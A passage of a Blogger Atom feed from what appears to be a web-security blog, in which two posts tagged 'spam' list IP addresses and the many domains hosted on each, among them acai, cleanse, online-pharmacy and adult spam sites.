xmlns:app="http://www.w3.org/2007/app">2010-01-18T06:34:39.765-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>PureAcai Elite Spam</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1RxK4r44iI/AAAAAAAAA6w/lWvSEzlCl_g/s1600-h/PureAcaiElite.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 229px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1RxK4r44iI/AAAAAAAAA6w/lWvSEzlCl_g/s320/PureAcaiElite.PNG" alt="" id="BLOGGER_PHOTO_ID_5428087882717389346" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;82.129.25.122&lt;br /&gt;&lt;br /&gt;absoluteacaiberry.com&lt;br /&gt;acaipowermax.com&lt;br /&gt;mail.powerfulacai.com&lt;br /&gt;powerfulacai.com&lt;br /&gt;prohealthcleanse.com&lt;br /&gt;redantiox.com&lt;br /&gt;strongcolon.com&lt;br /&gt;tryjunpurecleanse.com&lt;br /&gt;www.absoluteacaiberry.com&lt;br /&gt;www.acaipowermax.com&lt;br /&gt;www.antioxwine.com&lt;br /&gt;www.efficientacai.com&lt;br /&gt;www.perfectbenefitacai.com&lt;br /&gt;www.powerfulacai.com&lt;br /&gt;www.prohealthcleanse.com&lt;br /&gt;www.pureacaielite.com&lt;br /&gt;www.redantiox.com&lt;br /&gt;www.strongcolon.com&lt;br /&gt;www.xtraresveratrol.com&lt;br /&gt;www.youthcleanse.com&lt;br /&gt;xtraresveratrol.com&lt;br /&gt;youthcleanse.com&lt;br /&gt;&lt;br /&gt;82.129.25.123&lt;br /&gt;&lt;br /&gt;antioxwine.com&lt;br /&gt;efficientacai.com&lt;br /&gt;mail.efficientacai.com&lt;br /&gt;mail.perfectbenefitacai.com&lt;br /&gt;perfectbenefitacai.com&lt;br /&gt;www.absoluteacaiberry.com&lt;br /&gt;www.acaipowermax.com&lt;br /&gt;www.antioxwine.com&lt;br /&gt;www.efficientacai.com&lt;br /&gt;www.perfectbenefitacai.com&lt;br /&gt;www.powerfulacai.com&lt;br /&gt;www.prohealthcleanse.com&lt;br /&gt;www.pureacaielite.com&lt;br /&gt;www.redantiox.com&lt;br /&gt;www.strongcolon.com&lt;br /&gt;www.xtraresveratrol.com&lt;br /&gt;www.youthcleanse.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;93.188.248.182&lt;br /&gt;&lt;br /&gt;www.absoluteacaiberry.com&lt;br /&gt;www.acaipowermax.com&lt;br /&gt;www.antioxwine.com&lt;br /&gt;www.efficientacai.com&lt;br /&gt;www.perfectbenefitacai.com&lt;br /&gt;www.powerfulacai.com&lt;br /&gt;www.prohealthcleanse.com&lt;br /&gt;www.pureacaielite.com&lt;br /&gt;www.redantiox.com&lt;br /&gt;www.strongcolon.com&lt;br /&gt;www.xtraresveratrol.com&lt;br /&gt;www.youthcleanse.com&lt;br /&gt;&lt;br /&gt;93.188.248.183&lt;br /&gt;&lt;br /&gt;www.absoluteacaiberry.com&lt;br /&gt;www.acaipowermax.com&lt;br /&gt;www.antioxwine.com&lt;br /&gt;www.efficientacai.com&lt;br /&gt;www.perfectbenefitacai.com&lt;br /&gt;www.powerfulacai.com&lt;br /&gt;www.prohealthcleanse.com&lt;br /&gt;www.pureacaielite.com&lt;br /&gt;www.redantiox.com&lt;br /&gt;www.strongcolon.com&lt;br /&gt;www.xtraresveratrol.com&lt;br /&gt;www.youthcleanse.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5834702500954119071?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/5834702500954119071/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=5834702500954119071" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5834702500954119071?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5834702500954119071?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/RyGQc-rtGrc/pureacai-elite-spam.html" title="PureAcai Elite Spam" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1RxK4r44iI/AAAAAAAAA6w/lWvSEzlCl_g/s72-c/PureAcaiElite.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2010/01/pureacai-elite-spam.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUIBRHY7eSp7ImA9WxBQE0w.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-3140888977125348389</id><published>2010-01-12T08:22:00.000-08:00</published><updated>2010-01-12T08:25:55.801-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-12T08:25:55.801-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Spam ** 10-Jan-10</title><content type="html">91.208.228.78&lt;br /&gt;www.canadamedications-home.com&lt;br /&gt;&lt;br /&gt;222.170.127.122&lt;br /&gt;email-connect.com&lt;br /&gt;email-mailbox.com&lt;br /&gt;emailfriendz.com&lt;br /&gt;fuckbook-abrams.info&lt;br /&gt;fuckbook-cabral.com&lt;br /&gt;fuckbook-dale.com&lt;br /&gt;mailbox-email.com&lt;br /&gt;www.fuckbook-baca.com&lt;br /&gt;www.fuckbook-cabral.com&lt;br /&gt;www.fuckbook-dale.com&lt;br /&gt;www.fuckbook-DALEY.com&lt;br /&gt;www.fuckbook-CABRERA.com&lt;br /&gt;www.fuckbook-BABIN.com&lt;br /&gt;www.fuckbook-BACHMAN.com&lt;br /&gt;&lt;br /&gt;124.248.32.48&lt;br /&gt;prettymoral.com&lt;br /&gt;www.fakipokap.cn&lt;br /&gt;www.behofuhej.cn&lt;br /&gt;www.mipuzukok.cn&lt;br /&gt;www.wahumxh.cn&lt;br /&gt;&lt;br /&gt;210.212.30.131&lt;br /&gt;yeckydmai.com&lt;br /&gt;*.medsmedicinedirect.com&lt;br /&gt;*.nucquyfro.com&lt;br /&gt;*.pailetrepf.com&lt;br /&gt;*.qugoqudal.com&lt;br /&gt;*.rhopnizelj.com&lt;br /&gt;*.rvaulybvoa.com&lt;br /&gt;*.superstoremeds.com&lt;br /&gt;*.supertabletpillshealth.com&lt;br /&gt;*.superwellbeing.net&lt;br /&gt;*.unnaxedy.com&lt;br /&gt;*.utvorehdufa.com&lt;br /&gt;*.wisuilufmo.com&lt;br /&gt;*.yupnyojrufl.com&lt;br /&gt;*.zmautnipvy.com&lt;br /&gt;admin.nucquyfro.com&lt;br /&gt;admin.pharmacybetterhealth.com&lt;br /&gt;admin.rxtabletshealth.com&lt;br /&gt;admin.vomhequnn.com&lt;br /&gt;mail.nucquyfro.com&lt;br /&gt;mail.pailetrepf.com&lt;br /&gt;mail.pharmacybetterhealth.com&lt;br /&gt;mail.qugoqudal.com&lt;br /&gt;mail.relcuhebi.com&lt;br /&gt;mail.rxtabletshealth.com&lt;br /&gt;mail.ryudfyvduaw.com&lt;br /&gt;mail.supertabletpillshealth.com&lt;br /&gt;mail.tabletownhealthrx.com&lt;br /&gt;mail.yupdytytix.com&lt;br /&gt;medsmedicinedirect.com&lt;br /&gt;ns1.medsmedicinedirect.com&lt;br /&gt;ns1.mrihahve.com&lt;br /&gt;ns1.nucquyfro.com&lt;br /&gt;ns1.pharmacybetterhealth.com&lt;br /&gt;ns1.qugoqudal.com&lt;br /&gt;ns1.relcuhebi.com&lt;br /&gt;ns1.sohfevevyl.com&lt;br /&gt;ns1.supertabletpillshealth.com&lt;br /&gt;ns1.uyrfyucli.net&lt;br /&gt;ns1.vomhequnn.com&lt;br /&gt;ns1.yotgorjyu.com&lt;br /&gt;ns2.medsmedicinedirect.com&lt;br /&gt;ns2.mrihahve.com&lt;br /&gt;ns2.nucquyfro.com&lt;br /&gt;ns2.relcuhebi.com&lt;br /&gt;ns2.rxcapsuleshealth.com&lt;br /&gt;ns2.rxtabletshealth.com&lt;br /&gt;ns2.vomhequnn.com&lt;br /&gt;qukmifnuo.com&lt;br /&gt;rhopnizelj.com&lt;br /&gt;rvaulybvoa.com&lt;br /&gt;rxdrugstorenew.com&lt;br /&gt;ryudfyvduaw.com&lt;br /&gt;sohfevevyl.com&lt;br /&gt;sreljeowy.com&lt;br /&gt;superstoremeds.com&lt;br /&gt;superwellbeing.net&lt;br /&gt;tabletownhealthrx.com&lt;br /&gt;tluncimavv.com&lt;br /&gt;uisdovykwe.net&lt;br /&gt;unnaxedy.com&lt;br /&gt;upmevpuoto.com&lt;br /&gt;utvorehdufa.com&lt;br /&gt;whugyrgip.com&lt;br /&gt;yotgorjyu.com&lt;br /&gt;yupdytytix.com&lt;br /&gt;zmautnipvy.com&lt;br /&gt;pharmacybetterhealth.com&lt;br /&gt;qugoqudal.com&lt;br /&gt;relcuhebi.com&lt;br /&gt;rxtabletshealth.com&lt;br /&gt;supertabletpillshealth.com&lt;br /&gt;tabletownhealthrx.com&lt;br /&gt;yupdytytix.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;121.127.132.144&lt;br /&gt;*.abotrcue.cn&lt;br /&gt;abotrcue.cn&lt;br /&gt;admin.abotrcue.cn&lt;br /&gt;www.abotrcue.cn&lt;br /&gt;www.abxlwwue.cn&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;116.123.221.214&lt;br /&gt;*.25vip-2010.com&lt;br /&gt;*.krapobraves.com&lt;br /&gt;*.savolinosas.net&lt;br /&gt;*.vip52-2010.com&lt;br /&gt;25vip-2010.com&lt;br /&gt;krapobraves.com&lt;br /&gt;drugsmunmro37a.net&lt;br /&gt;ns1.krapobraves.com&lt;br /&gt;ns1.savolinosas.net&lt;br /&gt;ns2.krapobraves.com&lt;br /&gt;ns2.savolinosas.net&lt;br /&gt;ns3.krapobraves.com&lt;br /&gt;ns3.savolinosas.net&lt;br /&gt;ns4.krapobraves.com&lt;br /&gt;ns4.savolinosas.net&lt;br /&gt;savolinosas.net&lt;br /&gt;www.25vip-2010.com&lt;br /&gt;&lt;br /&gt;61.235.117.75&lt;br /&gt;*.loxuzaqad.cn&lt;br /&gt;64d4.loxuzaqad.cn&lt;br /&gt;loxuzaqad.cn&lt;br /&gt;sir-t.cn&lt;br /&gt;xyu-bam.cn&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;174.132.227.82&lt;br /&gt;*.mediafilestorage.net&lt;br /&gt;*.redirto.com&lt;br /&gt;2009tatil.com&lt;br /&gt;2rabweb.com&lt;br /&gt;ajecto.com&lt;br /&gt;ajecto.ru&lt;br /&gt;ancestrykey.com&lt;br /&gt;arezdagasket.com&lt;br /&gt;arezdapurnamaloka.com&lt;br /&gt;articulatehosting.com&lt;br /&gt;backbonetek.com&lt;br /&gt;bihepinc.com&lt;br /&gt;bistrooncinders.com&lt;br /&gt;bizozguruz.com&lt;br /&gt;buycallawaygolf.info&lt;br /&gt;capoeiraphilippines.com&lt;br /&gt;cheapcanoncamera.us&lt;br /&gt;cheapnikoncamera.us&lt;br /&gt;cholerias.com&lt;br /&gt;clubtrikolik.net&lt;br /&gt;conceptekilibre.com&lt;br /&gt;cyberkraft.in&lt;br /&gt;deercee.com&lt;br /&gt;desainy.com&lt;br /&gt;designtweaks.com&lt;br /&gt;eastwestinteractive.com&lt;br /&gt;elianceconnectronics.com&lt;br /&gt;exploreruralhimalayas.com&lt;br /&gt;favotec.net&lt;br /&gt;federalgrantexpress.com&lt;br /&gt;federalgrantsacademy.com&lt;br /&gt;federalgrantsmoney.com&lt;br /&gt;fekrapro.com&lt;br /&gt;fofotara.com&lt;br /&gt;forexbreakingnews.com&lt;br /&gt;forwebsites.net&lt;br /&gt;friendsteroutline.com&lt;br /&gt;gands-contracting.com&lt;br /&gt;gateturkey.com&lt;br /&gt;globalscreenings.com&lt;br /&gt;goaseahomes.com&lt;br /&gt;gokovabelediyesi.com&lt;br /&gt;hosting.ajecto.com&lt;br /&gt;hostregion.com&lt;br /&gt;iammundee.com&lt;br /&gt;igamblefree.com&lt;br /&gt;infobailes.com&lt;br /&gt;inveway.com&lt;br /&gt;island21.org&lt;br /&gt;itsaboutdelhi.com&lt;br /&gt;itsaboutdelhi.info&lt;br /&gt;janabenitez.net&lt;br /&gt;jhc2004.com&lt;br /&gt;jmzgroup.com&lt;br /&gt;joco-ceramics.com&lt;br /&gt;klipizlex.net&lt;br /&gt;kozlukuyu.com&lt;br /&gt;lamoxiegroup.com&lt;br /&gt;lankaemail.com&lt;br /&gt;learngermanreviews.com&lt;br /&gt;learningfrenchcritic.com&lt;br /&gt;learnjapanesequickly.com&lt;br /&gt;lofotentaxi.com&lt;br /&gt;logger32.net&lt;br /&gt;lvumanpower.com&lt;br /&gt;mail.hrlink.vn&lt;br /&gt;metasys.in&lt;br /&gt;metasystech.com&lt;br /&gt;modblog.net&lt;br /&gt;mohammedjamal.info&lt;br /&gt;mylastamen.net&lt;br /&gt;newenglandnswdirectory.com&lt;br /&gt;ns1.cyberkraft.in&lt;br /&gt;ns1.fofotara.com&lt;br /&gt;officechairsale.info&lt;br /&gt;olimpiyatevi.com&lt;br /&gt;onlineurdu.com&lt;br /&gt;outboardassist.com&lt;br /&gt;placiahotel.com&lt;br /&gt;portalmedia.com.au&lt;br /&gt;ppmq.org&lt;br /&gt;printersworldnetwork.com&lt;br /&gt;profoundstupidity.net&lt;br /&gt;pvhc.net&lt;br /&gt;qaqarat.com&lt;br /&gt;radyogazete.com&lt;br /&gt;raggedangel.net&lt;br /&gt;recliningofficechair.info&lt;br /&gt;rtowebsolution.com&lt;br /&gt;s8ft.com&lt;br /&gt;s8ft.net&lt;br /&gt;sandeshaya.com&lt;br /&gt;scrappyshop.com&lt;br /&gt;secureend.com&lt;br /&gt;shogungsm.com&lt;br /&gt;sirijayasri.com&lt;br /&gt;sparkpixel.com&lt;br /&gt;ssctindia.org&lt;br /&gt;stockfuture.org&lt;br /&gt;superlinkkuwait.com&lt;br /&gt;thetimbers.net&lt;br /&gt;todaytrading.com&lt;br /&gt;trikolik.com&lt;br /&gt;ventana7.com&lt;br /&gt;waterfallwaydesigns.com&lt;br /&gt;wolkacentrum.com&lt;br /&gt;woodsnwatertaxidermy.net&lt;br /&gt;worldads.tk&lt;br /&gt;wrkondreamz.org&lt;br /&gt;www.hostregion.com&lt;br /&gt;www.igamblefree.com&lt;br /&gt;www.learningfrenchcritic.com&lt;br /&gt;www.mediafilestorage.net&lt;br /&gt;www.metasystech.com&lt;br /&gt;www.onlineurdu.com&lt;br /&gt;www.profoundstupidity.net&lt;br /&gt;www.redirto.com&lt;br /&gt;www.s8ft.com&lt;br /&gt;www.worldads.tk&lt;br /&gt;yaoo.net&lt;br /&gt;zilla.ru&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;61.61.20.162&lt;br /&gt;vujehewis.cn&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;69.16.253.125&lt;br /&gt;shibdassmetals.com&lt;br /&gt;aamantrandelhi.com&lt;br /&gt;aaradhyaindia.org&lt;br /&gt;activedesign.org&lt;br /&gt;adaindia.in&lt;br /&gt;agencyverticals.com&lt;br /&gt;amayaclinic.com&lt;br /&gt;andamanchronicle.com&lt;br /&gt;anika.in&lt;br /&gt;artcollegechandigarh.org&lt;br /&gt;auramall.in&lt;br /&gt;batha-ads.org&lt;br /&gt;bharatinstitutes.org&lt;br /&gt;bhilai85sss4.com&lt;br /&gt;bishnoism.com&lt;br /&gt;bumsumshi.com&lt;br /&gt;canineelite.com&lt;br /&gt;castleton.co.in&lt;br /&gt;cgmfpfed.org&lt;br /&gt;cgnewsupdate.com&lt;br /&gt;chamberoflaw.com&lt;br /&gt;chanakyagroup.org&lt;br /&gt;computerithub.com&lt;br /&gt;csvtu.ac.in&lt;br /&gt;dainiksandhyaprakash.com&lt;br /&gt;dcbgirlscollegejorhat.org&lt;br /&gt;divineskincareindia.com&lt;br /&gt;effluxtechnologies.com&lt;br /&gt;ewaytech.net&lt;br /&gt;fcyr.org&lt;br /&gt;floralart.co.in&lt;br /&gt;flowersofindia.net&lt;br /&gt;forgeter.com&lt;br /&gt;frontalagritech.co.in&lt;br /&gt;futuregold.in&lt;br /&gt;goenkaeducation.org&lt;br /&gt;golaghatcommercecollege.org&lt;br /&gt;grand-resort.co.in&lt;br /&gt;grandplaza.co.in&lt;br /&gt;graphicreflections.org&lt;br /&gt;gurunanakinstitutes.com&lt;br /&gt;guwahatione.com&lt;br /&gt;harieducation.org&lt;br /&gt;historicalroutes.com&lt;br /&gt;hojoindia.com&lt;br /&gt;horizoninfosys.org&lt;br /&gt;iescp.org&lt;br /&gt;iietjind.com&lt;br /&gt;iirmr.net&lt;br /&gt;iiwchennai.org&lt;br /&gt;indianincenseonline.com&lt;br /&gt;indiapackersmovers.net&lt;br /&gt;indicurecosmeticsurgery.com&lt;br /&gt;indicurerehabilitation.com&lt;br /&gt;indoswiss.net&lt;br /&gt;inld.biz&lt;br /&gt;innomark.in&lt;br /&gt;invernessmedicalindia.com&lt;br /&gt;irps.in&lt;br /&gt;itsbhiwani.com&lt;br /&gt;jandaood.co.in&lt;br /&gt;jangsher.com&lt;br /&gt;jundokan-gojuryu.org&lt;br /&gt;kaliaborcollege.org&lt;br /&gt;kalikavu.com&lt;br /&gt;karaninstitutes.com&lt;br /&gt;kovaisales.com&lt;br /&gt;krninstitute.com&lt;br /&gt;kundan.co.in&lt;br /&gt;lokdcollegedhekiajuli.org&lt;br /&gt;loyalcomputers.net&lt;br /&gt;lscp.ac.in&lt;br /&gt;maharishichannel.net&lt;br /&gt;mail.guwahatione.com&lt;br /&gt;mail.irps.in&lt;br /&gt;malaysiatravelcentre.in&lt;br /&gt;manugill.info&lt;br /&gt;mprexports.com&lt;br /&gt;myeducationfunda.com&lt;br /&gt;navsiddharthaartgroup.org&lt;br /&gt;newsite.in&lt;br /&gt;nitakumar.net&lt;br /&gt;noidamalls.com&lt;br /&gt;nrenterprisesindia.org&lt;br /&gt;ns1.webcomindia.net&lt;br /&gt;optigolfindia.com&lt;br /&gt;paramountwebsolution.com&lt;br /&gt;rangaparacollege.org&lt;br /&gt;regularnetwork.com&lt;br /&gt;resalemachines.biz&lt;br /&gt;rnemcrohtak.org&lt;br /&gt;saijewel.com&lt;br /&gt;shahoils.com&lt;br /&gt;sitapurmahotsava.com&lt;br /&gt;smrealtors.in&lt;br /&gt;sodaltech.in&lt;br /&gt;solomontechnologies.org&lt;br /&gt;spreadsnet.org&lt;br /&gt;sripipefitting.com&lt;br /&gt;ssrealestate.co.in&lt;br /&gt;stssociety.org&lt;br /&gt;techvoteindia.com&lt;br /&gt;thinnkware.com&lt;br /&gt;travtourindia.com&lt;br /&gt;trtcguwahati.org&lt;br /&gt;truevirtues.net&lt;br /&gt;ttcpkc.org&lt;br /&gt;uttarakhandtourism.net&lt;br /&gt;verb.co.in&lt;br /&gt;visa-trans.com&lt;br /&gt;vtirohtak.org&lt;br /&gt;waytonikah.com&lt;br /&gt;whisperingpines.co.in&lt;br /&gt;wiwbee.com&lt;br /&gt;worldtrademarkpatent.com&lt;br /&gt;www.agencyverticals.com&lt;br /&gt;www.indiapackersmovers.net&lt;br /&gt;www.internet20.org&lt;br /&gt;www.kovaisales.com&lt;br /&gt;xoftoasis.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;67.19.250.209&lt;br /&gt;101freetools.com&lt;br /&gt;anevakateva.info&lt;br /&gt;cefnacaribbean.com&lt;br /&gt;d1.fa.1343.static.theplanet.com&lt;br /&gt;dbcindia.in&lt;br /&gt;doriashowerfilter.com&lt;br /&gt;eispilates.com&lt;br /&gt;jonahproject.net&lt;br /&gt;kish-health.org&lt;br /&gt;lifeinsurancepolicy-401k.com&lt;br /&gt;lifestyledecorate.com&lt;br /&gt;mail.eispilates.com&lt;br /&gt;michaeljacksonisntdead.net&lt;br /&gt;mollymckay.net&lt;br /&gt;monarchturf.com&lt;br /&gt;monicagallo.com&lt;br /&gt;saqconsultor.com&lt;br /&gt;shambletrain.com&lt;br /&gt;sweethomealternative.com&lt;br /&gt;takeabow.info&lt;br /&gt;terencedunn.com&lt;br /&gt;tjwinegardner.com&lt;br /&gt;www.eispilates.com&lt;br /&gt;www.kish-health.org&lt;br /&gt;www.mollymckay.net&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;66.197.212.102&lt;br /&gt;tv4free.8k.ro&lt;br /&gt;free.8k.ro&lt;br /&gt;support.8k.ro&lt;br /&gt;&lt;br /&gt;195.70.35.216&lt;br /&gt;palfalvi.hu&lt;br /&gt;*.karosinfo.hu&lt;br /&gt;a1taxi.hu&lt;br /&gt;ago-sport.hu&lt;br /&gt;agrarplaza.com&lt;br /&gt;akkumulator.net&lt;br /&gt;americarservice.hu&lt;br /&gt;amerikai-autoszerviz.hu&lt;br /&gt;aquamasters.hu&lt;br /&gt;barkoczy.net&lt;br /&gt;bekecsaba.hu&lt;br /&gt;bollobas.hu&lt;br /&gt;bonolact.com&lt;br /&gt;bordersped.com&lt;br /&gt;ceramiceurope.com&lt;br /&gt;cityhit.net&lt;br /&gt;dentorient.net&lt;br /&gt;dxantech.com&lt;br /&gt;dynamictours.hu&lt;br /&gt;e-mpire.hu&lt;br /&gt;euceramic.com&lt;br /&gt;euceramicmarket.com&lt;br /&gt;euhunting.com&lt;br /&gt;eutilemarket.com&lt;br /&gt;eutileshop.com&lt;br /&gt;ferienhaus-fort.com&lt;br /&gt;fewo-fort.com&lt;br /&gt;furdoruha.com&lt;br /&gt;gasztroenterologus.com&lt;br /&gt;gaviascience.com&lt;br /&gt;geier.hu&lt;br /&gt;gesta.hu&lt;br /&gt;gesztenyes.hu&lt;br /&gt;glb-consulting.com&lt;br /&gt;gobelincouture.com&lt;br /&gt;hdriltd.com&lt;br /&gt;hhs.hu&lt;br /&gt;hidrotech.net&lt;br /&gt;hipi.hu&lt;br /&gt;icup2008.com&lt;br /&gt;immo-balaton.hu&lt;br /&gt;jogtorte.net&lt;br /&gt;karos.net&lt;br /&gt;karosinfo.hu&lt;br /&gt;kegyelet.com&lt;br /&gt;kehidaingatlan.com&lt;br /&gt;kopet2000.hu&lt;br /&gt;kormanymu.com&lt;br /&gt;kovatsits.com&lt;br /&gt;landceramic.com&lt;br /&gt;lyra.hu&lt;br /&gt;medgyesi.com&lt;br /&gt;mesefigurasfalfestes.hu&lt;br /&gt;moneysavinghomepage.com&lt;br /&gt;motocomic.com&lt;br /&gt;motocomics.com&lt;br /&gt;mugyujtokejszakaja.hu&lt;br /&gt;multitiersolution.com&lt;br /&gt;napfurdo.com&lt;br /&gt;narc.hu&lt;br /&gt;netpatika.net&lt;br /&gt;nyugat-balaton.com&lt;br /&gt;ocipe.hu&lt;br /&gt;operett.com&lt;br /&gt;orvosok.com&lt;br /&gt;osztalykirandulas.com&lt;br /&gt;ouraborus.com&lt;br /&gt;palmbeach.hu&lt;br /&gt;pap-sziget.hu&lt;br /&gt;papirtaska.com&lt;br /&gt;peg.hu&lt;br /&gt;peterbertalan.com&lt;br /&gt;pingwinet.hu&lt;br /&gt;previewfiction.com&lt;br /&gt;primadentplus.com&lt;br /&gt;probiotikum.com&lt;br /&gt;pusztacaccia.com&lt;br /&gt;rokfort.net&lt;br /&gt;rozsdamentes.com&lt;br /&gt;s2.webtar.hu&lt;br /&gt;scatoli.it&lt;br /&gt;servosteuerung.com&lt;br /&gt;shiatsu.hu&lt;br /&gt;sikerakademia.eu&lt;br /&gt;studium-nyelviskola.hu&lt;br /&gt;sunsetdesign.net&lt;br /&gt;szabb.com&lt;br /&gt;szabofolia.com&lt;br /&gt;szalanczy.com&lt;br /&gt;szamitastechnika.net&lt;br /&gt;szelidi-to.hu&lt;br /&gt;szentorban.com&lt;br /&gt;szigetkozkft.hu&lt;br /&gt;szogyenyi.hu&lt;br /&gt;szoroban.com&lt;br /&gt;szuperdomain.com&lt;br /&gt;szurkepuli.hu&lt;br /&gt;temeto.com&lt;br /&gt;thegameman.net&lt;br /&gt;torellas-art.com&lt;br /&gt;toys-port.com&lt;br /&gt;trailerfiction.com&lt;br /&gt;trioajto.hu&lt;br /&gt;turak.hu&lt;br /&gt;tuzoltosag-pomaz.hu&lt;br /&gt;uniqa-ep.hu&lt;br /&gt;utszoroso.hu&lt;br /&gt;vadkert.hu&lt;br /&gt;vagyonbiztonsag.hu&lt;br /&gt;vasipar.hu&lt;br /&gt;vecsei.net&lt;br /&gt;virtualceramic.com&lt;br /&gt;virtualceramicmarket.com&lt;br /&gt;virtualceramicshop.com&lt;br /&gt;virtualtilemarket.com&lt;br /&gt;warhammer.hu&lt;br /&gt;worldceramicmarket.com&lt;br /&gt;worldceramicshop.com&lt;br /&gt;www.bekecsaba.hu&lt;br /&gt;www.hipi.hu&lt;br /&gt;xn--szmtstechnika-4dbc4q.net&lt;br /&gt;zclubhungary.hu&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;83.245.63.121&lt;br /&gt;*.crayodyne.com&lt;br /&gt;1vending.com&lt;br /&gt;888bootcamp.com&lt;br /&gt;adapa.si&lt;br /&gt;adswebprint.com&lt;br /&gt;albanyassociates.com&lt;br /&gt;alexbatty.net&lt;br /&gt;ambadyconstructions.com&lt;br /&gt;arevelation.com&lt;br /&gt;artisshock.com&lt;br /&gt;atraktos.com&lt;br /&gt;autosbondia.com&lt;br /&gt;aytugondes.com&lt;br /&gt;badboyzevent.com&lt;br /&gt;bankcottage-guesthouse.com&lt;br /&gt;bcbrit.net&lt;br /&gt;bersy.it&lt;br /&gt;bettingleague.net&lt;br /&gt;burglar-alarms.net&lt;br /&gt;caravans-for-sale.com&lt;br /&gt;carpetcleaningservice.net&lt;br /&gt;cavershamafc.com&lt;br /&gt;cbjcolo.net&lt;br /&gt;chezvouspc.com&lt;br /&gt;chezvouspc.net&lt;br /&gt;chrixkit.net&lt;br /&gt;clayhallosteopaths.com&lt;br /&gt;clearwaybuilder.com&lt;br /&gt;corporate-entertainment1.com&lt;br /&gt;crayodyne.com&lt;br /&gt;darranwilliams.net&lt;br /&gt;devdos.com&lt;br /&gt;directcorsica.com&lt;br /&gt;dragonred.com&lt;br /&gt;ecituk.com&lt;br /&gt;eniana.com&lt;br /&gt;epools.net&lt;br /&gt;equinetourism.com&lt;br /&gt;eventfirstaidservices.com&lt;br /&gt;flowerglow.com&lt;br /&gt;fountainfineart.com&lt;br /&gt;fridaykhutbah.net&lt;br /&gt;friendly-places.com&lt;br /&gt;garethmoore.net&lt;br /&gt;geaweb.com&lt;br /&gt;globalsurfari.com&lt;br /&gt;harchester.net&lt;br /&gt;harrybeckers.com&lt;br /&gt;helmdevelopment.net&lt;br /&gt;hintkumasi.com&lt;br /&gt;http.lithium.lon.periodicnetwork.com&lt;br /&gt;inplates.com&lt;br /&gt;inspiredhf.com&lt;br /&gt;intelly.net&lt;br /&gt;jedocomputers.com&lt;br /&gt;kallkwikbirmingham.com&lt;br /&gt;kenmackenzie.com&lt;br /&gt;kentishgraphics.com&lt;br /&gt;keywebdesign.net&lt;br /&gt;kineticnorth.com&lt;br /&gt;kitchendeepclean.com&lt;br /&gt;lainy.net&lt;br /&gt;leafgreendisplays.com&lt;br /&gt;leehenrymusic.com&lt;br /&gt;legalexplus.com&lt;br /&gt;leisuremaintenance.com&lt;br /&gt;lestudiofitness.com&lt;br /&gt;letshaveaholidayinspain.com&lt;br /&gt;lordkrishnabuilders.com&lt;br /&gt;luv4food.net&lt;br /&gt;mail.atraktos.com&lt;br /&gt;mail2b.atraktos.com&lt;br /&gt;mannmachine.com&lt;br /&gt;mantova.net&lt;br /&gt;maplemole.net&lt;br /&gt;marcophones.com&lt;br /&gt;mbunit.com&lt;br /&gt;mechalift.com&lt;br /&gt;melankolik.com&lt;br /&gt;mgvenice.com&lt;br /&gt;miczakbuilders.com&lt;br /&gt;mor-design.co.uk&lt;br /&gt;motorhomes-for-sale.com&lt;br /&gt;mumsbymaria.com&lt;br /&gt;mysticfamiliar.com&lt;br /&gt;newtbeerfest.com&lt;br /&gt;nijigenki.com&lt;br /&gt;nijiworld.com&lt;br /&gt;orkconsult.com&lt;br /&gt;parkhomes-for-sale.com&lt;br /&gt;payroling.com&lt;br /&gt;pierresmulders.com&lt;br /&gt;pro-testing.com&lt;br /&gt;profecole.com&lt;br /&gt;rauncharoo.com&lt;br /&gt;rooswinkel.net&lt;br /&gt;saleel.net&lt;br /&gt;selenoi.net&lt;br /&gt;silksoflondon.net&lt;br 